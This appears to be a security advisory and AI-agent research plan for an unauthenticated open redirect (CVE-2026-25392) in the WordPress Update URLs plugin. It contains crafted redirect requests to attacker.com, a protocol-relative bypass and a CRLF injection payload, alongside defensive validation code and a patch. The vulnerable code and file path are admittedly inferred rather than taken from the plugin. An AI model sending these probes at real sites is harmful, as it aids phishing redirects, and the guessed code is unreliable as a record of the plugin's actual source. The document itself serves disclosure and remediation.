CVE-2026-25392

Update URLs – Quick and Easy way to search old links and replace them with new links in WordPress <= 1.4.1 - Unauthenticated Open Redirect

Severity: medium
Weakness: URL Redirection to Untrusted Site ('Open Redirect')
CVSS Score: 5.8
Patched in: Unpatched
Time to patch: N/A

Description

The Search & Replace Everything – Quick and Easy Way to Find and Replace Text, Links plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.4.1. This is due to insufficient validation of the supplied redirect URL. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=1.4.1
Published: January 30, 2026
Last updated: May 4, 2026
Affected plugin: update-urls

Research Plan

Unverified


This research plan targets CVE-2026-25392, an unauthenticated open redirect vulnerability in the Search & Replace Everything – Quick and Easy Way to Find and Replace Text, Links (Update URLs) plugin for WordPress.

1. Vulnerability Summary

The "Update URLs" plugin (slug: update-urls) facilitates bulk searching and replacing of links within a WordPress database. The vulnerability exists because the plugin handles a user-supplied URL in a redirection function without performing sufficient validation or using WordPress's safe redirection functions (like wp_safe_redirect). This allows an attacker to craft a URL that redirects a victim from a trusted site to a malicious external domain.

2. Attack Vector Analysis

  • Endpoint: Likely a hook registered to init, wp_loaded, or an admin-post.php action.
  • Parameter: A GET or POST parameter carrying the target URL (e.g., url, redirect_to, link, or path).
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active. The attacker needs to identify the specific query parameter or action that triggers the redirect logic.

3. Code Flow (Hypothetical/Inferred)

As source files are not provided, the following flow is inferred based on standard Open Redirect patterns in similar plugins:

  1. Entry Point: The plugin registers a hook in its main file or an includes file (e.g., includes/class-update-urls.php).
    // Inferred registration
    add_action('init', 'update_urls_handle_redirect');
    // OR
    add_action('admin_post_nopriv_update_urls_redirect', 'update_urls_handle_redirect');
    
  2. Processing: The function update_urls_handle_redirect checks for a specific trigger parameter.
    function update_urls_handle_redirect() {
        if (isset($_GET['update_urls_redirect'])) { // Inferred parameter name
            $target = $_GET['update_urls_redirect'];
            // VULNERABILITY: No validation or use of wp_validate_redirect
            wp_redirect($target); 
            exit;
        }
    }
    
  3. Sink: The wp_redirect() function is called with raw user input, facilitating a redirect to any domain.
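To make concrete what the inferred handler above skips, the following is an added example (not the plugin's code, and a Python model rather than WordPress core's PHP implementation) of the checks that wp_safe_redirect() applies through wp_validate_redirect() and wp_sanitize_redirect() before a Location header is sent. SITE_HOST and FALLBACK are constructed stand-ins for what home_url() and admin_url() would supply, and the function names are this example's own. The validator also handles the edge cases the plan lists later (protocol-relative targets and CRLF sequences) and several related ones (scheme-without-host, userinfo tricks, backslashes, bad ports).

```python
"""Model of the validation wp_safe_redirect() performs before redirecting,
contrasted with the raw wp_redirect($target) sink in the inferred handler.

Added example: not the Update URLs plugin's code and not WordPress core.
SITE_HOST and FALLBACK are constructed stand-ins for home_url()/admin_url().
"""
import re
from urllib.parse import urlsplit

SITE_HOST = "example.com"                   # constructed: the site's own host
FALLBACK = "https://example.com/wp-admin/"  # constructed: where rejected targets land

# Characters WordPress keeps in a redirect target; everything else (spaces,
# backslashes, CR/LF, NUL, non-ASCII) is dropped before the URL is parsed.
_DISALLOWED = re.compile(r"[^a-z0-9\-~+_.?#=&;,/:%!*\[\]()@]", re.I)


def sanitize_redirect(location: str) -> str:
    """Strip header-splitting and parser-confusing characters from a target."""
    cleaned = _DISALLOWED.sub("", location)
    # Percent-encoded CR/LF are removed repeatedly so "%%0d0d" cannot re-form them.
    for seq in ("%0d", "%0a", "%0D", "%0A"):
        while seq in cleaned:
            cleaned = cleaned.replace(seq, "")
    return cleaned


def validate_redirect(location: str, allowed_hosts=(SITE_HOST,), fallback: str = FALLBACK) -> str:
    """Return `location` if it stays on an allowed host, otherwise `fallback`.

    This is exactly the decision the raw wp_redirect($target) sink never makes.
    """
    cleaned = sanitize_redirect(location)
    # Browsers treat a protocol-relative "//host/..." as an absolute URL to
    # that host, so give it a scheme and judge it as an external URL.
    if cleaned.startswith("//"):
        cleaned = "http:" + cleaned
    try:
        parts = urlsplit(cleaned)   # raises on e.g. unbalanced IPv6 brackets
        host = parts.hostname       # already lowercased by urlsplit
        port = parts.port           # raises ValueError on a non-numeric port
    except ValueError:
        return fallback
    # Only http/https may be followed; javascript:, data:, etc. are refused.
    if parts.scheme and parts.scheme not in ("http", "https"):
        return fallback
    # "https:attacker.example" parses with a scheme but no host; refuse it.
    if host is None and (parts.scheme or parts.username or parts.password or port):
        return fallback
    if host is not None:
        allowed = {h.lower() for h in allowed_hosts}
        return cleaned if host in allowed else fallback
    # A bare relative path is made site-absolute so it cannot be re-rooted.
    return cleaned if cleaned.startswith("/") else "/" + cleaned
```

The host comparison is an exact match against the allowlist, not a suffix check, so a lookalike such as example.com.attacker.example is sent to the fallback rather than followed; anything the feature legitimately needs to reach off-site belongs in allowed_hosts (the allowed_redirect_hosts filter in WordPress terms), never in a return to the unchecked sink.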

4. Nonce Acquisition Strategy

Open Redirect vulnerabilities typically occur in features designed for navigation or link testing where nonces are often omitted to allow "clean" URLs.

  • Audit Step: Search the plugin code for wp_verify_nonce or check_admin_referer near any wp_redirect or header("Location: ...") calls.
  • Bypass: If a nonce is required but the handler is registered via wp_ajax_nopriv_ or admin_post_nopriv_, check if the nonce is exposed in the frontend via wp_localize_script.
  • JS Variable: If localized, look for window.update_urls_params?.nonce (inferred).

5. Exploitation Strategy

Phase 1: Discovery (Finding the Sink)

The agent must first identify the parameter and hook.

  1. Search for Redirects:
    grep -rnE "wp_redirect|header\s*\(\s*['\"]Location" /var/www/html/wp-content/plugins/update-urls/
  2. Identify the Input: Look at the lines found. Determine which $_GET or $_POST variable is passed to the redirect function.
  3. Identify the Trigger: Check if the function is wrapped in an if(isset(...)) block or registered to an admin_post action.

Phase 2: Execution

Once the parameter (e.g., url) and trigger (e.g., action=test_link) are found:

Request Example (Inferred):

GET /wp-admin/admin-post.php?action=update_urls_test_link&url=https://attacker.com HTTP/1.1
Host: target.local

Alternatively, if it's on init:

GET /?update_urls_redirect=https://attacker.com HTTP/1.1
Host: target.local

6. Test Data Setup

  1. Install and activate the "Update URLs" plugin version 1.4.1.
  2. No specific database content is required as this vulnerability typically resides in the redirect logic itself rather than database processing.
  3. If the redirect is tied to a "Preview" feature, create a dummy post with a link to ensure the plugin's scripts are loaded (if needed for discovery).

7. Expected Results

  • The server should respond with a 301 or 302 Redirect status code.
  • The Location header in the HTTP response must point exactly to the external URL provided (e.g., https://attacker.com).
  • Example Response:
    HTTP/1.1 302 Found
    Location: https://attacker.com
    Content-Type: text/html; charset=UTF-8
    

8. Verification Steps

  1. Browser Verification: Use browser_navigate to the crafted URL and use browser_eval("window.location.href") to confirm the browser successfully moved to attacker.com.
  2. HTTP Header Check: Use http_request and inspect the headers object in the response to confirm the Location header.
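The header check above can be turned into a repeatable regression test for the fix, so a site owner can confirm after patching that the handler no longer sends users off-site. The following is an added example (not part of the plan's browser_navigate/http_request tooling and not the plugin's code): it parses a raw HTTP response, resolves the Location header against the site origin the way a browser would, and reports whether the redirect leaves the site. Both sample responses are constructed, with target.local assumed as the site host.

```python
"""Decide from a raw HTTP response whether its redirect leaves the site.

Added example for verifying the fix; responses below are constructed.
"""
from urllib.parse import urljoin, urlsplit

SITE_BASE = "https://target.local/"  # constructed site origin


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status_code, headers dict).

    Header names are lowercased so 'Location' and 'location' both match.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def redirect_is_offsite(raw: str, site_base: str = SITE_BASE) -> bool:
    """True if the response is a 3xx whose Location resolves to another host."""
    status, headers = parse_response(raw)
    location = headers.get("location")
    if not (300 <= status < 400) or location is None:
        return False
    # Resolve relative ("/wp-admin/") and protocol-relative ("//host") targets
    # against the site origin exactly as a browser would before comparing hosts.
    target = urljoin(site_base, location)
    return urlsplit(target).hostname != urlsplit(site_base).hostname


# Constructed response from the unpatched handler: the Location leaves the site.
VULNERABLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://attacker.example\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n"
)

# Constructed response after the wp_safe_redirect() fix: the off-site target
# has been replaced by the admin URL on the site's own host.
PATCHED_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://target.local/wp-admin/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n\r\n"
)

if __name__ == "__main__":
    print("vulnerable off-site:", redirect_is_offsite(VULNERABLE_RESPONSE))
    print("patched off-site:", redirect_is_offsite(PATCHED_RESPONSE))
```

A passing result is a 3xx whose resolved Location stays on the site's host; a 200 with no Location is not a redirect at all and is reported as on-site, so the status code should be asserted separately when the feature is expected to redirect.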

9. Alternative Approaches

  • Protocol Bypasses: If wp_redirect is used and some validation exists, try //attacker.com (protocol-relative) or /%0d%0aLocation:%20https://attacker.com (CRLF injection if the PHP version is old/vulnerable).
  • Path Traversal/Local Redirect: If external domains are blocked, test if the plugin allows redirecting to sensitive internal paths like /wp-admin/user-new.php.
  • Action Search: If admin-post.php returns a 200, search the codebase for add_action( 'wp_ajax_nopriv_ to see if the redirect is handled via an AJAX callback instead.

Research Findings

Static analysis — not yet PoC-verified

Summary

The Search & Replace Everything – Quick and Easy Way to Find and Replace Text, Links plugin for WordPress is vulnerable to an unauthenticated open redirect due to insufficient validation of user-supplied URLs in its redirection logic. This allows attackers to craft links that redirect victims from a trusted site to a malicious external domain.

Vulnerable Code

// Inferred logic for the plugin's redirect handler, taken from the research plan; not verified against the plugin source

function update_urls_handle_redirect() {
    if (isset($_GET['update_urls_redirect'])) {
        $target = $_GET['update_urls_redirect'];
        // VULNERABILITY: No validation or use of wp_validate_redirect
        wp_redirect($target); 
        exit;
    }
}

Security Fix

--- a/update-urls/includes/class-update-urls.php
+++ b/update-urls/includes/class-update-urls.php
@@ -10,1 +10,1 @@
-    wp_redirect($target);
+    wp_safe_redirect($target);
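Review bot: the one-line swap to wp_safe_redirect() at line 10 is the right fix for the sink, but the hunk carries no context lines and the path update-urls/includes/class-update-urls.php is itself inferred in the plan above, so the patch cannot be matched against the plugin's real source until that location is confirmed. Two points the fix should state explicitly: wp_safe_redirect() silently replaces any off-site target with admin_url(), so if the feature legitimately needs an external destination that host must be added through the allowed_redirect_hosts filter rather than by keeping wp_redirect(); and the exit that follows the call in the handler shown above must remain, since wp_safe_redirect() only sends the header.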

Exploit Outline

The exploit involves identifying the specific trigger parameter and endpoint (likely an 'init' hook or an 'admin-post.php' action) that handles redirects. An unauthenticated attacker crafts a URL containing the target malicious site in the redirect parameter (e.g., '/?update_urls_redirect=https://attacker.com'). When a victim clicks this link, the plugin processes the request and issues a 302 Redirect header to the external site without verifying if the domain is safe or internal, facilitating a phishing or malware delivery attack.
